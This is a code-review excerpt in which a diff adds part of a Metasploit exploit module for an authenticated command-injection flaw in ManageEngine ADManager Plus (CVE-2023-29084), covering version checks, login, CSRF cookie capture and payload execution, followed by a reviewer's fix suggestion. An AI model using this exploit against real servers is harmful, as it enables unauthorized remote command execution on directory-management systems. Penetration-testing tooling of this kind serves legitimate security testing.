modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb

```diff
@@ -0,0 +1,221 @@
+    end
+
+    print_good('Logged in successfully!')
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET'
+    )
+
+    unless res && res.code == 200 && res.body
+      return CheckCode::Unknown('Browsing to root of website returned a non-200 or empty response!')
+    end
+
+    unless res.body&.match(/\.val\('ADManager Plus Authentication'\)/)
+      return CheckCode::Safe('Target is not running ADManager Plus!')
+    end
+
+    build_number = res.body&.match(/src=".+\.js\?v=(\d{4})"/)
+    unless build_number
+      return CheckCode::Unknown('Home page did not leak the build number via the ?v= parameter as expected!')
+    end
+
+    build_number = build_number[1]
+    print_good("The target is running AdManager Plus build #{build_number}!")
+
+    # Versions 7181 and later are patched, everything prior is vulnerable.
+    target_build = Rex::Version.new(build_number)
+    if target_build >= Rex::Version.new('7181')
+      CheckCode::Safe('Target is running a patched version of AdManager Plus!')
+    elsif target_build < Rex::Version.new('7181')
+      CheckCode::Appears('Target appears to be running a vulnerable version of AdManager Plus!')
+    else
+      CheckCode::Unknown("An unknown error occurred when trying to parse the build number: #{build_number}. Please report this error!")
+    end
+  end
+
+  def exploit
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!')
+    end
+
+    login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN'])
+
+    # We need to do this post login otherwise we will get errors. This also ensures we get updated
+    # cookies post login as these can sometimes change post login process.
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!')
+    end
+
+    # Check that we actually got our cookies updated post authentication and visiting the homepage.
+    unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/)
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.')
+    end
+
+    @csrf_cookie = nil
+    for cookie in @cookie_jar&.cookies
+      if cookie.name == 'adscsrf'
+        @csrf_cookie = cookie.value
+        break
+      end
+    end
+
+    fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?
+
+    if target['Type'] == :win_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
```

Comment:
This is a dead code path now that that the dropper target was removed.
```suggestion
    execute_command(payload.encoded)
```

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/18018/commits/ac99cb32711377646d30ce9bee39d1a0dcc6a2f4 with suggested fix.